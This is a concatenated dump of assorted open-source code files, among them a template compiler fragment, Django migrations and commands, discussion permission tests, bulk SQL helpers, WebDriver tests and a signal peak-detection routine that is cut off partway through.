scope_frame.inspect(node.iter_child_nodes())
aliases = self.push_scope(scope_frame)
self.pull_locals(scope_frame)
self.blockvisit(node.body, scope_frame)
self.pop_scope(aliases, scope_frame)
def visit_EvalContextModifier(self, node, frame):
for keyword in node.options:
self.writeline('context.eval_ctx.%s = ' % keyword.key)
self.visit(keyword.value, frame)
try:
val = keyword.value.as_const(frame.eval_ctx)
except nodes.Impossible:
frame.eval_ctx.volatile = True
else:
setattr(frame.eval_ctx, keyword.key, val)
def visit_ScopedEvalContextModifier(self, node, frame):
old_ctx_name = self.temporary_identifier()
safed_ctx = frame.eval_ctx.save()
self.writeline('%s = context.eval_ctx.save()' % old_ctx_name)
self.visit_EvalContextModifier(node, frame)
for child in node.body:
self.visit(child, frame)
frame.eval_ctx.revert(safed_ctx)
self.writeline('context.eval_ctx.revert(%s)' % old_ctx_name)
| apache-2.0 |
Tigerwhit4/taiga-back | taiga/projects/custom_attributes/migrations/0005_auto_20150505_1639.py | 23 | 1088 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django_pgjson.fields
class Migration(migrations.Migration):
dependencies = [
('custom_attributes', '0004_create_empty_customattributesvalues_for_existen_object'),
]
operations = [
migrations.AlterField(
model_name='issuecustomattributesvalues',
name='attributes_values',
field=django_pgjson.fields.JsonField(verbose_name='values', default={}),
preserve_default=True,
),
migrations.AlterField(
model_name='taskcustomattributesvalues',
name='attributes_values',
field=django_pgjson.fields.JsonField(verbose_name='values', default={}),
preserve_default=True,
),
migrations.AlterField(
model_name='userstorycustomattributesvalues',
name='attributes_values',
field=django_pgjson.fields.JsonField(verbose_name='values', default={}),
preserve_default=True,
),
]
| agpl-3.0 |
Metronote/metronotesd-alpha | lib/burn.py | 1 | 3750 | #! /usr/bin/python3
import struct
import decimal
D = decimal.Decimal
from fractions import Fraction
from . import (util, config, exceptions, bitcoin)
"""Burn {} to earn {} during a special period of time.""".format(config.BTC, config.XMN)
ID = 60
def validate (db, source, destination, quantity, block_index, overburn=False):
problems = []
# Check destination address.
if destination != config.UNSPENDABLE:
problems.append('wrong destination address')
if not isinstance(quantity, int):
problems.append('quantity must be in satoshis')
return problems
if quantity < 0: problems.append('negative quantity')
# Try to make sure that the burned funds won't go to waste.
if block_index < config.BURN_START - 1:
problems.append('too early')
elif block_index > config.BURN_END:
problems.append('too late')
return problems
def compose (db, source, quantity, overburn=False):
cursor = db.cursor()
destination = config.UNSPENDABLE
problems = validate(db, source, destination, quantity, util.last_block(db)['block_index'], overburn=overburn)
if problems: raise exceptions.BurnError(problems)
# Check that a maximum of 1 BTC total is burned per address.
burns = list(cursor.execute('''SELECT * FROM burns WHERE (status = ? AND source = ?)''', ('valid', source)))
already_burned = sum([burn['burned'] for burn in burns])
if quantity > (1 * config.UNIT - already_burned) and not overburn:
raise exceptions.BurnError('1 {} may be burned per address'.format(config.BTC))
cursor.close()
return (source, [(destination, quantity)], None)
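# Illustrative note: for a burn the returned triple is simply
# (source, [(config.UNSPENDABLE, quantity)], None): one output paying
# the unspendable address and no data payload.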
def parse (db, tx, message=None):
burn_parse_cursor = db.cursor()
status = 'valid'
if status == 'valid':
problems = validate(db, tx['source'], tx['destination'], tx['btc_amount'], tx['block_index'], overburn=False)
if problems: status = 'invalid: ' + '; '.join(problems)
if tx['btc_amount'] != None:
sent = tx['btc_amount']
else:
sent = 0
if status == 'valid':
# Calculate quantity of XMN earned. (Maximum 1 BTC in total, ever.)
cursor = db.cursor()
cursor.execute('''SELECT * FROM burns WHERE (status = ? AND source = ?)''', ('valid', tx['source']))
burns = cursor.fetchall()
already_burned = sum([burn['burned'] for burn in burns])
#ONE = 1 * config.UNIT
ONE = config.BURN_MAX * config.UNIT
max_burn = ONE - already_burned
if sent > max_burn: burned = max_burn # Exceeded maximum burn; earn what you can.
else: burned = sent
total_time = config.BURN_END - config.BURN_START
partial_time = config.BURN_END - tx['block_index']
#multiplier = (1000 + (500 * Fraction(partial_time, total_time)))
multiplier = config.BURN_MULTIPLIER * (1 + (.5 * Fraction(partial_time, total_time)))
earned = round(burned * multiplier)
# Credit source address with earned XMN.
util.credit(db, tx['block_index'], tx['source'], config.XMN, earned, event=tx['tx_hash'])
else:
burned = 0
earned = 0
# Add parsed transaction to message-type–specific table.
# TODO: store sent in table
bindings = {
'tx_index': tx['tx_index'],
'tx_hash': tx['tx_hash'],
'block_index': tx['block_index'],
'source': tx['source'],
'burned': burned,
'earned': earned,
'status': status,
}
sql='insert into burns values(:tx_index, :tx_hash, :block_index, :source, :burned, :earned, :status)'
burn_parse_cursor.execute(sql, bindings)
burn_parse_cursor.close()
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
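# Worked example (illustrative only; the concrete value of BURN_MULTIPLIER
# is an assumption, not taken from config): with BURN_MULTIPLIER = 1000,
# a burn made exactly halfway through the burn period gives
# Fraction(partial_time, total_time) = 1/2, so
#     multiplier = 1000 * (1 + .5 * 1/2) = 1250
#     earned     = round(burned * 1250)
# i.e. the bonus decays linearly from 1.5x at BURN_START to 1.0x at BURN_END.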
| mit |
ufosky-server/zulip | analytics/management/commands/client_activity.py | 114 | 2830 | from __future__ import absolute_import, print_function
from django.core.management.base import BaseCommand
from django.db.models import Count
from zerver.models import UserActivity, UserProfile, Realm, \
get_realm, get_user_profile_by_email
import datetime
class Command(BaseCommand):
help = """Report rough client activity globally, for a realm, or for a user
Usage examples:
python manage.py client_activity
python manage.py client_activity zulip.com
python manage.py client_activity jesstess@zulip.com"""
def add_arguments(self, parser):
parser.add_argument('arg', metavar='<arg>', type=str, nargs='?', default=None,
help="realm or user to estimate client activity for")
def compute_activity(self, user_activity_objects):
# Report data from the past week.
#
# This is a rough report of client activity because we inconsistently
# register activity from various clients; think of it as telling you
# approximately how many people from a group have used a particular
# client recently. For example, this might be useful to get a sense of
# how popular different versions of a desktop client are.
#
# Importantly, this does NOT tell you anything about the relative
# volumes of requests from clients.
threshold = datetime.datetime.now() - datetime.timedelta(days=7)
client_counts = user_activity_objects.filter(
last_visit__gt=threshold).values("client__name").annotate(
count=Count('client__name'))
total = 0
counts = []
for client_type in client_counts:
count = client_type["count"]
client = client_type["client__name"]
total += count
counts.append((count, client))
counts.sort()
for count in counts:
print "%25s %15d" % (count[1], count[0])
print "Total:", total
def handle(self, *args, **options):
if options['arg'] is None:
# Report global activity.
self.compute_activity(UserActivity.objects.all())
else:
arg = options['arg']
try:
# Report activity for a user.
user_profile = get_user_profile_by_email(arg)
self.compute_activity(UserActivity.objects.filter(
user_profile=user_profile))
except UserProfile.DoesNotExist:
try:
# Report activity for a realm.
realm = get_realm(arg)
self.compute_activity(UserActivity.objects.filter(
user_profile__realm=realm))
except Realm.DoesNotExist:
print "Unknown user or domain %s" % (arg,)
exit(1)
| apache-2.0 |
moreati/uwsgi | tests/websockets.py | 13 | 2254 | #!./uwsgi --https :8443,foobar.crt,foobar.key --http-websockets --gevent 100 --module tests.websockets
import uwsgi
import gevent
from gevent.queue import JoinableQueue
from gevent.socket import wait_read
queue = JoinableQueue()
def application(env, sr):
ws_scheme = 'ws'
if 'HTTPS' in env or env['wsgi.url_scheme'] == 'https':
ws_scheme = 'wss'
if env['PATH_INFO'] == '/':
sr('200 OK', [('Content-Type', 'text/html')])
return """
<html>
<head>
<script language="Javascript">
var s = new WebSocket("%s://%s/foobar/");
s.onopen = function() {
alert("connected !!!");
s.send("ciao");
};
s.onmessage = function(e) {
var bb = document.getElementById('blackboard')
var html = bb.innerHTML;
bb.innerHTML = html + '<br/>' + e.data;
};
s.onerror = function(e) {
alert(e);
}
s.onclose = function(e) {
alert("connection closed");
}
function invia() {
var value = document.getElementById('testo').value;
s.send(value);
}
</script>
</head>
<body>
<h1>WebSocket</h1>
<input type="text" id="testo"/>
<input type="button" value="invia" onClick="invia();"/>
<div id="blackboard" style="width:640px;height:480px;background-color:black;color:white;border: solid 2px red;overflow:auto">
</div>
</body>
</html>
""" % (ws_scheme, env['HTTP_HOST'])
elif env['PATH_INFO'] == '/foobar/':
uwsgi.websocket_handshake(env['HTTP_SEC_WEBSOCKET_KEY'], env.get('HTTP_ORIGIN', ''))
print "websockets..."
while True:
msg = uwsgi.websocket_recv_nb()
if msg:
queue.put(msg)
else:
try:
wait_read(uwsgi.connection_fd(), 0.1)
except gevent.socket.timeout:
try:
msg = queue.get_nowait()
uwsgi.websocket_send(msg)
except:
pass
return ""
| gpl-2.0 |
franosincic/edx-platform | lms/djangoapps/discussion_api/tests/test_permissions.py | 34 | 4986 | """
Tests for discussion API permission logic
"""
import itertools
import ddt
from discussion_api.permissions import (
can_delete,
get_editable_fields,
get_initializable_comment_fields,
get_initializable_thread_fields,
)
from lms.lib.comment_client.comment import Comment
from lms.lib.comment_client.thread import Thread
from lms.lib.comment_client.user import User
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
def _get_context(requester_id, is_requester_privileged, is_cohorted=False, thread=None):
"""Return a context suitable for testing the permissions module"""
return {
"cc_requester": User(id=requester_id),
"is_requester_privileged": is_requester_privileged,
"course": CourseFactory(cohort_config={"cohorted": is_cohorted}),
"thread": thread,
}
@ddt.ddt
class GetInitializableFieldsTest(ModuleStoreTestCase):
"""Tests for get_*_initializable_fields"""
@ddt.data(*itertools.product([True, False], [True, False]))
@ddt.unpack
def test_thread(self, is_privileged, is_cohorted):
context = _get_context(
requester_id="5",
is_requester_privileged=is_privileged,
is_cohorted=is_cohorted
)
actual = get_initializable_thread_fields(context)
expected = {
"abuse_flagged", "course_id", "following", "raw_body", "read", "title", "topic_id", "type", "voted"
}
if is_privileged and is_cohorted:
expected |= {"group_id"}
self.assertEqual(actual, expected)
@ddt.data(*itertools.product([True, False], ["question", "discussion"], [True, False]))
@ddt.unpack
def test_comment(self, is_thread_author, thread_type, is_privileged):
context = _get_context(
requester_id="5",
is_requester_privileged=is_privileged,
thread=Thread(user_id="5" if is_thread_author else "6", thread_type=thread_type)
)
actual = get_initializable_comment_fields(context)
expected = {
"abuse_flagged", "parent_id", "raw_body", "thread_id", "voted"
}
if (is_thread_author and thread_type == "question") or is_privileged:
expected |= {"endorsed"}
self.assertEqual(actual, expected)
@ddt.ddt
class GetEditableFieldsTest(ModuleStoreTestCase):
"""Tests for get_editable_fields"""
@ddt.data(*itertools.product([True, False], [True, False], [True, False]))
@ddt.unpack
def test_thread(self, is_author, is_privileged, is_cohorted):
thread = Thread(user_id="5" if is_author else "6", type="thread")
context = _get_context(
requester_id="5",
is_requester_privileged=is_privileged,
is_cohorted=is_cohorted
)
actual = get_editable_fields(thread, context)
expected = {"abuse_flagged", "following", "read", "voted"}
if is_author or is_privileged:
expected |= {"topic_id", "type", "title", "raw_body"}
if is_privileged and is_cohorted:
expected |= {"group_id"}
self.assertEqual(actual, expected)
@ddt.data(*itertools.product([True, False], [True, False], ["question", "discussion"], [True, False]))
@ddt.unpack
def test_comment(self, is_author, is_thread_author, thread_type, is_privileged):
comment = Comment(user_id="5" if is_author else "6", type="comment")
context = _get_context(
requester_id="5",
is_requester_privileged=is_privileged,
thread=Thread(user_id="5" if is_thread_author else "6", thread_type=thread_type)
)
actual = get_editable_fields(comment, context)
expected = {"abuse_flagged", "voted"}
if is_author or is_privileged:
expected |= {"raw_body"}
if (is_thread_author and thread_type == "question") or is_privileged:
expected |= {"endorsed"}
self.assertEqual(actual, expected)
@ddt.ddt
class CanDeleteTest(ModuleStoreTestCase):
"""Tests for can_delete"""
@ddt.data(*itertools.product([True, False], [True, False]))
@ddt.unpack
def test_thread(self, is_author, is_privileged):
thread = Thread(user_id="5" if is_author else "6")
context = _get_context(requester_id="5", is_requester_privileged=is_privileged)
self.assertEqual(can_delete(thread, context), is_author or is_privileged)
@ddt.data(*itertools.product([True, False], [True, False], [True, False]))
@ddt.unpack
def test_comment(self, is_author, is_thread_author, is_privileged):
comment = Comment(user_id="5" if is_author else "6")
context = _get_context(
requester_id="5",
is_requester_privileged=is_privileged,
thread=Thread(user_id="5" if is_thread_author else "6")
)
self.assertEqual(can_delete(comment, context), is_author or is_privileged)
| agpl-3.0 |
norayr/unisubs | libs/bulkops.py | 6 | 3083 | # TODO: Remove this once the new data model lands.
# This is from http://www.caktusgroup.com/blog/2011/09/20/bulk-inserts-django/
# Bulk insert/update DB operations for the Django ORM. Useful when
# inserting/updating lots of objects where the bottleneck is overhead
# in talking to the database. Instead of doing this
#
# for x in seq:
# o = SomeObject()
# o.foo = x
# o.save()
#
# or equivalently this
#
# for x in seq:
# SomeObject.objects.create(foo=x)
#
# do this
#
# l = []
# for x in seq:
# o = SomeObject()
# o.foo = x
# l.append(o)
# insert_many(l)
#
# Note that these operations are really simple. They won't work with
# many-to-many relationships, and you may have to divide really big
# lists into smaller chunks before sending them through.
#
# History
# 2010-12-10: quote column names, reported by Beres Botond.
def insert_many(objects, using="default"):
"""Insert list of Django objects in one SQL query. Objects must be
of the same Django model. Note that save is not called and signals
on the model are not raised."""
if not objects:
return
import django.db.models
from django.db import connections, transaction
con = connections[using]
model = objects[0].__class__
fields = [f for f in model._meta.fields if not isinstance(f, django.db.models.AutoField)]
parameters = []
for o in objects:
parameters.append(tuple(f.get_db_prep_save(f.pre_save(o, True), connection=con) for f in fields))
table = model._meta.db_table
column_names = ",".join(con.ops.quote_name(f.column) for f in fields)
placeholders = ",".join(("%s",) * len(fields))
con.cursor().executemany(
"insert into %s (%s) values (%s)" % (table, column_names, placeholders),
parameters)
transaction.commit_unless_managed()
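# Usage sketch (illustrative, not part of the original module): insert_many
# issues a single executemany, so, as the header comment suggests, very
# large lists may need to be divided into smaller chunks first:
#
# def insert_many_chunked(objects, chunk_size=1000, using="default"):
#     for start in range(0, len(objects), chunk_size):
#         insert_many(objects[start:start + chunk_size], using=using)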
def update_many(objects, fields=[], using="default"):
"""Update list of Django objects in one SQL query, optionally only
overwrite the given fields (as names, e.g. fields=["foo"]).
Objects must be of the same Django model. Note that save is not
called and signals on the model are not raised."""
if not objects:
return
import django.db.models
from django.db import connections, transaction
con = connections[using]
names = fields
meta = objects[0]._meta
fields = [f for f in meta.fields if not isinstance(f, django.db.models.AutoField) and (not names or f.name in names)]
if not fields:
raise ValueError("No fields to update, field names are %s." % names)
fields_with_pk = fields + [meta.pk]
parameters = []
for o in objects:
parameters.append(tuple(f.get_db_prep_save(f.pre_save(o, True), connection=con) for f in fields_with_pk))
table = meta.db_table
assignments = ",".join(("%s=%%s"% con.ops.quote_name(f.column)) for f in fields)
con.cursor().executemany(
"update %s set %s where %s=%%s" % (table, assignments, con.ops.quote_name(meta.pk.column)),
parameters)
transaction.commit_unless_managed()
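# Usage sketch (illustrative): overwrite only the "foo" column of pre-built
# objects in one SQL round trip; note that save() and model signals are
# skipped, as the docstring warns. compute_foo() is a hypothetical helper.
#
# objs = list(SomeObject.objects.all())
# for o in objs:
#     o.foo = compute_foo(o)
# update_many(objs, fields=["foo"])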
| agpl-3.0 |
onyxfish/stovetop | gdata/webmastertools/data.py | 126 | 5504 | #!/usr/bin/python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the data classes of the Google Webmaster Tools Data API"""
__author__ = 'j.s@google.com (Jeff Scudder)'
import atom.core
import atom.data
import gdata.data
import gdata.opensearch.data
WT_TEMPLATE = '{http://schemas.google.com/webmaster/tools/2007/}%s'
class CrawlIssueCrawlType(atom.core.XmlElement):
"""Type of crawl of the crawl issue"""
_qname = WT_TEMPLATE % 'crawl-type'
class CrawlIssueDateDetected(atom.core.XmlElement):
"""Detection date for the issue"""
_qname = WT_TEMPLATE % 'date-detected'
class CrawlIssueDetail(atom.core.XmlElement):
"""Detail of the crawl issue"""
_qname = WT_TEMPLATE % 'detail'
class CrawlIssueIssueType(atom.core.XmlElement):
"""Type of crawl issue"""
_qname = WT_TEMPLATE % 'issue-type'
class CrawlIssueLinkedFromUrl(atom.core.XmlElement):
"""Source URL that links to the issue URL"""
_qname = WT_TEMPLATE % 'linked-from'
class CrawlIssueUrl(atom.core.XmlElement):
"""URL affected by the crawl issue"""
_qname = WT_TEMPLATE % 'url'
class CrawlIssueEntry(gdata.data.GDEntry):
"""Describes a crawl issue entry"""
date_detected = CrawlIssueDateDetected
url = CrawlIssueUrl
detail = CrawlIssueDetail
issue_type = CrawlIssueIssueType
crawl_type = CrawlIssueCrawlType
linked_from = [CrawlIssueLinkedFromUrl]
class CrawlIssuesFeed(gdata.data.GDFeed):
"""Feed of crawl issues for a particular site"""
entry = [CrawlIssueEntry]
class Indexed(atom.core.XmlElement):
"""Describes the indexing status of a site"""
_qname = WT_TEMPLATE % 'indexed'
class Keyword(atom.core.XmlElement):
"""A keyword in a site or in a link to a site"""
_qname = WT_TEMPLATE % 'keyword'
source = 'source'
class KeywordEntry(gdata.data.GDEntry):
"""Describes a keyword entry"""
class KeywordsFeed(gdata.data.GDFeed):
"""Feed of keywords for a particular site"""
entry = [KeywordEntry]
keyword = [Keyword]
class LastCrawled(atom.core.XmlElement):
"""Describes the last crawled date of a site"""
_qname = WT_TEMPLATE % 'last-crawled'
class MessageBody(atom.core.XmlElement):
"""Message body"""
_qname = WT_TEMPLATE % 'body'
class MessageDate(atom.core.XmlElement):
"""Message date"""
_qname = WT_TEMPLATE % 'date'
class MessageLanguage(atom.core.XmlElement):
"""Message language"""
_qname = WT_TEMPLATE % 'language'
class MessageRead(atom.core.XmlElement):
"""Indicates if the message has already been read"""
_qname = WT_TEMPLATE % 'read'
class MessageSubject(atom.core.XmlElement):
"""Message subject"""
_qname = WT_TEMPLATE % 'subject'
class SiteId(atom.core.XmlElement):
"""Site URL"""
_qname = WT_TEMPLATE % 'id'
class MessageEntry(gdata.data.GDEntry):
"""Describes a message entry"""
wt_id = SiteId
subject = MessageSubject
date = MessageDate
body = MessageBody
language = MessageLanguage
read = MessageRead
class MessagesFeed(gdata.data.GDFeed):
"""Describes a messages feed"""
entry = [MessageEntry]
class SitemapEntry(gdata.data.GDEntry):
"""Describes a sitemap entry"""
indexed = Indexed
wt_id = SiteId
class SitemapMobileMarkupLanguage(atom.core.XmlElement):
"""Describes a markup language for URLs in this sitemap"""
_qname = WT_TEMPLATE % 'sitemap-mobile-markup-language'
class SitemapMobile(atom.core.XmlElement):
"""Lists acceptable mobile markup languages for URLs in this sitemap"""
_qname = WT_TEMPLATE % 'sitemap-mobile'
sitemap_mobile_markup_language = [SitemapMobileMarkupLanguage]
class SitemapNewsPublicationLabel(atom.core.XmlElement):
"""Specifies the publication label for this sitemap"""
_qname = WT_TEMPLATE % 'sitemap-news-publication-label'
class SitemapNews(atom.core.XmlElement):
"""Lists publication labels for this sitemap"""
_qname = WT_TEMPLATE % 'sitemap-news'
sitemap_news_publication_label = [SitemapNewsPublicationLabel]
class SitemapType(atom.core.XmlElement):
"""Indicates the type of sitemap. Not used for News or Mobile Sitemaps"""
_qname = WT_TEMPLATE % 'sitemap-type'
class SitemapUrlCount(atom.core.XmlElement):
"""Indicates the number of URLs contained in the sitemap"""
_qname = WT_TEMPLATE % 'sitemap-url-count'
class SitemapsFeed(gdata.data.GDFeed):
"""Describes a sitemaps feed"""
entry = [SitemapEntry]
class VerificationMethod(atom.core.XmlElement):
"""Describes a verification method that may be used for a site"""
_qname = WT_TEMPLATE % 'verification-method'
in_use = 'in-use'
type = 'type'
class Verified(atom.core.XmlElement):
"""Describes the verification status of a site"""
_qname = WT_TEMPLATE % 'verified'
class SiteEntry(gdata.data.GDEntry):
"""Describes a site entry"""
indexed = Indexed
wt_id = SiteId
verified = Verified
last_crawled = LastCrawled
verification_method = [VerificationMethod]
class SitesFeed(gdata.data.GDFeed):
"""Describes a sites feed"""
entry = [SiteEntry]
| mit |
benjaminsoellner/2015_Data_Analyst_Project_3 | Lesson_5_Analyzing_Data/16-Same_Operator/population.py | 3 | 2354 | #!/usr/bin/env python
"""
In an earlier exercise we looked at the cities dataset and asked which region in India contains
the most cities. In this exercise, we'd like you to answer a related question regarding regions in
India. What is the average city population for a region in India? Calculate your answer by first
finding the average population of cities in each region and then by calculating the average of the
regional averages.
Hint: If you want to accumulate using values from all input documents to a group stage, you may use
a constant as the value of the "_id" field. For example,
{ "$group" : "India Regional City Population Average",
... }
Please modify only the 'make_pipeline' function so that it creates and returns an aggregation
pipeline that can be passed to the MongoDB aggregate function. As in our examples in this lesson,
the aggregation pipeline should be a list of one or more dictionary objects.
Please review the lesson examples if you are unsure of the syntax.
Your code will be run against a MongoDB instance that we have provided. If you want to run this code
locally on your machine, you have to install MongoDB, download and insert the dataset.
For instructions related to MongoDB setup and datasets please see Course Materials.
Please note that the dataset you are using here is a smaller version of the twitter dataset used
in examples in this lesson. If you attempt some of the same queries that we looked at in the lesson
examples, your results will be different.
"""
def get_db(db_name):
from pymongo import MongoClient
client = MongoClient('localhost:27017')
db = client[db_name]
return db
def make_pipeline():
# complete the aggregation pipeline
pipeline = [{"$match": {"country": "India"}},
{"$unwind": "$isPartOf"},
{"$group": {"_id": "$isPartOf", "avg": {"$avg": "$population"}}},
{"$group": {"_id": "avg", "avg": {"$avg": "$avg"}}}]
return pipeline
def aggregate(db, pipeline):
result = db.cities.aggregate(pipeline)
return result
if __name__ == '__main__':
db = get_db('examples')
pipeline = make_pipeline()
result = aggregate(db, pipeline)
assert len(result["result"]) == 1
assert result["result"][0]["avg"] == 196025.97814809752
import pprint
pprint.pprint(result)
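# Shape of the intermediate documents (illustrative): after the first $group,
# each region is reduced to {"_id": "<region>", "avg": <regional average>};
# the second $group then collapses all regional documents into a single one
# keyed by the constant "avg", averaging the regional averages.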
| agpl-3.0 |
askeing/servo | tests/wpt/web-platform-tests/webdriver/tests/actions/mouse.py | 3 | 4720 | import pytest
from tests.actions.support.mouse import get_center
from tests.actions.support.refine import get_events, filter_dict
from tests.support.asserts import assert_move_to_coordinates
from tests.support.inline import inline
from tests.support.wait import wait
def link_doc(dest):
content = "<a href=\"{}\" id=\"link\">destination</a>".format(dest)
return inline(content)
# TODO use pytest.approx once we upgrade to pytest > 3.0
def approx(n, m, tolerance=1):
return abs(n - m) <= tolerance
def test_click_at_coordinates(session, test_actions_page, mouse_chain):
div_point = {
"x": 82,
"y": 187,
}
mouse_chain \
.pointer_move(div_point["x"], div_point["y"], duration=1000) \
.click() \
.perform()
events = get_events(session)
assert len(events) == 4
assert_move_to_coordinates(div_point, "outer", events)
for e in events:
if e["type"] != "mousedown":
assert e["buttons"] == 0
assert e["button"] == 0
expected = [
{"type": "mousedown", "buttons": 1},
{"type": "mouseup", "buttons": 0},
{"type": "click", "buttons": 0},
]
filtered_events = [filter_dict(e, expected[0]) for e in events]
assert expected == filtered_events[1:]
def test_context_menu_at_coordinates(session, test_actions_page, mouse_chain):
div_point = {
"x": 82,
"y": 187,
}
mouse_chain \
.pointer_move(div_point["x"], div_point["y"]) \
.pointer_down(button=2) \
.pointer_up(button=2) \
.perform()
events = get_events(session)
expected = [
{"type": "mousedown", "button": 2},
{"type": "contextmenu", "button": 2},
]
assert len(events) == 4
filtered_events = [filter_dict(e, expected[0]) for e in events]
mousedown_contextmenu_events = [
x for x in filtered_events
if x["type"] in ["mousedown", "contextmenu"]
]
assert expected == mousedown_contextmenu_events
def test_click_element_center(session, test_actions_page, mouse_chain):
outer = session.find.css("#outer", all=False)
center = get_center(outer.rect)
mouse_chain.click(element=outer).perform()
events = get_events(session)
assert len(events) == 4
event_types = [e["type"] for e in events]
assert ["mousemove", "mousedown", "mouseup", "click"] == event_types
for e in events:
if e["type"] != "mousemove":
assert approx(e["pageX"], center["x"])
assert approx(e["pageY"], center["y"])
assert e["target"] == "outer"
def test_click_navigation(session, url, release_actions):
destination = url("/webdriver/tests/actions/support/test_actions_wdspec.html")
start = link_doc(destination)
def click(link):
mouse_chain = session.actions.sequence(
"pointer", "pointer_id", {"pointerType": "mouse"})
mouse_chain.click(element=link).perform()
session.url = start
error_message = "Did not navigate to %s" % destination
click(session.find.css("#link", all=False))
wait(session, lambda s: s.url == destination, error_message)
# repeat steps to check behaviour after document unload
session.url = start
click(session.find.css("#link", all=False))
wait(session, lambda s: s.url == destination, error_message)
@pytest.mark.parametrize("drag_duration", [0, 300, 800])
@pytest.mark.parametrize("dx, dy",
[(20, 0), (0, 15), (10, 15), (-20, 0), (10, -15), (-10, -15)])
def test_drag_and_drop(session,
test_actions_page,
mouse_chain,
dx,
dy,
drag_duration):
drag_target = session.find.css("#dragTarget", all=False)
initial_rect = drag_target.rect
initial_center = get_center(initial_rect)
# Conclude chain with extra move to allow time for last queued
# coordinate-update of drag_target and to test that drag_target is "dropped".
mouse_chain \
.pointer_move(0, 0, origin=drag_target) \
.pointer_down() \
.pointer_move(dx, dy, duration=drag_duration, origin="pointer") \
.pointer_up() \
.pointer_move(80, 50, duration=100, origin="pointer") \
.perform()
# mouseup that ends the drag is at the expected destination
e = get_events(session)[1]
assert e["type"] == "mouseup"
assert approx(e["pageX"], initial_center["x"] + dx)
assert approx(e["pageY"], initial_center["y"] + dy)
# check resulting location of the dragged element
final_rect = drag_target.rect
assert initial_rect["x"] + dx == final_rect["x"]
assert initial_rect["y"] + dy == final_rect["y"]
| mpl-2.0 |
piMoll/SEILAPLAN | tool/peakdetect.py | 1 | 27677 | # -*- coding: utf-8 -*-
import numpy as np
from math import pi, log
try:
from scipy import fft, ifft
from scipy.optimize import curve_fit
except ImportError: # also catches removed names, not just missing modules
# Import error is handled in seilaplanPlugin.py run() function
pass
i = 10000
x = np.linspace(0, 3.5 * pi, i)
y = (0.3*np.sin(x) + np.sin(1.3 * x) + 0.9 * np.sin(4.2 * x) + 0.06 *
np.random.randn(i))
def _datacheck_peakdetect(x_axis, y_axis):
if x_axis is None:
x_axis = range(len(y_axis))
if len(y_axis) != len(x_axis):
raise ValueError('Input vectors y_axis and x_axis must have same length')
#needs to be a numpy array
y_axis = np.array(y_axis)
x_axis = np.array(x_axis)
return x_axis, y_axis
def _peakdetect_parabole_fitter(raw_peaks, x_axis, y_axis, points):
"""
Performs the actual parabole fitting for the peakdetect_parabole function.
keyword arguments:
raw_peaks -- A list of either the maximium or the minimum peaks, as given
by the peakdetect_zero_crossing function, with index used as x-axis
x_axis -- A numpy list of all the x values
y_axis -- A numpy list of all the y values
points -- How many points around the peak should be used during curve
fitting, must be odd.
return -- A list giving all the peaks and the fitted waveform, format:
[[x, y, [fitted_x, fitted_y]]]
"""
func = lambda x, k, tau, m: k * ((x - tau) ** 2) + m
fitted_peaks = []
for peak in raw_peaks:
index = peak[0]
x_data = x_axis[index - points // 2: index + points // 2 + 1]
y_data = y_axis[index - points // 2: index + points // 2 + 1]
# get a first approximation of tau (peak position in time)
tau = x_axis[index]
# get a first approximation of peak amplitude
m = peak[1]
# build list of approximations
# k = -m as first approximation?
p0 = (-m, tau, m)
popt, pcov = curve_fit(func, x_data, y_data, p0)
# retrieve tau and m i.e x and y value of peak
x, y = popt[1:3]
# create a high resolution data set for the fitted waveform
x2 = np.linspace(x_data[0], x_data[-1], points * 10)
y2 = func(x2, *popt)
fitted_peaks.append([x, y, [x2, y2]])
return fitted_peaks
def peakdetect(y_axis, x_axis = None, lookahead = 300, delta=0):
"""
Converted from/based on a MATLAB script at:
http://billauer.co.il/peakdet.html
function for detecting local maxima and minima in a signal.
Discovers peaks by searching for values which are surrounded by lower
or larger values for maxima and minima respectively
keyword arguments:
y_axis -- A list containing the signal over which to find peaks
x_axis -- (optional) An x-axis whose values correspond to the y_axis list
and is used in the return to specify the position of the peaks. If
omitted an index of the y_axis is used. (default: None)
lookahead -- (optional) distance to look ahead from a peak candidate to
determine if it is the actual peak (default: 200)
'(sample / period) / f' where '4 >= f >= 1.25' might be a good value
delta -- (optional) this specifies a minimum difference between a peak and
the following points, before a peak may be considered a peak. Useful
to hinder the function from picking up false peaks towards to end of
the signal. To work well delta should be set to delta >= RMSnoise * 5.
(default: 0)
delta function causes a 20% decrease in speed, when omitted
Correctly used it can double the speed of the function
return -- two lists [max_peaks, min_peaks] containing the positive and
negative peaks respectively. Each cell of the lists contains a tuple
of: (position, peak_value)
to get the average peak value do: np.mean(max_peaks, 0)[1] on the
results to unpack one of the lists into x, y coordinates do:
x, y = zip(*tab)
"""
max_peaks = []
min_peaks = []
dump = [] #Used to pop the first hit which almost always is false
# check input data
x_axis, y_axis = _datacheck_peakdetect(x_axis, y_axis)
# store data length for later use
length = len(y_axis)
#perform some checks
if lookahead < 1:
raise ValueError("Lookahead must be '1' or above in value")
if not (np.isscalar(delta) and delta >= 0):
raise ValueError("delta must be a positive number")
#maxima and minima candidates are temporarily stored in
#mx and mn respectively
mn, mx = np.inf, -np.inf
#Only detect peak if there is 'lookahead' amount of points after it
for index, (x, y) in enumerate(zip(x_axis[:-lookahead],
y_axis[:-lookahead])):
if y > mx:
mx = y
mxpos = x
if y < mn:
mn = y
mnpos = x
####look for max####
if y < mx-delta and mx != np.inf:
#Maxima peak candidate found
#look ahead in signal to ensure that this is a peak and not jitter
if y_axis[index:index+lookahead].max() < mx:
max_peaks.append([mxpos, mx])
dump.append(True)
#set algorithm to only find minima now
mx = np.inf
mn = np.inf
if index+lookahead >= length:
#end is within lookahead no more peaks can be found
break
continue
#else: #slows shit down this does
# mx = ahead
# mxpos = x_axis[np.where(y_axis[index:index+lookahead]==mx)]
####look for min####
if y > mn+delta and mn != -np.inf:
#Minima peak candidate found
#look ahead in signal to ensure that this is a peak and not jitter
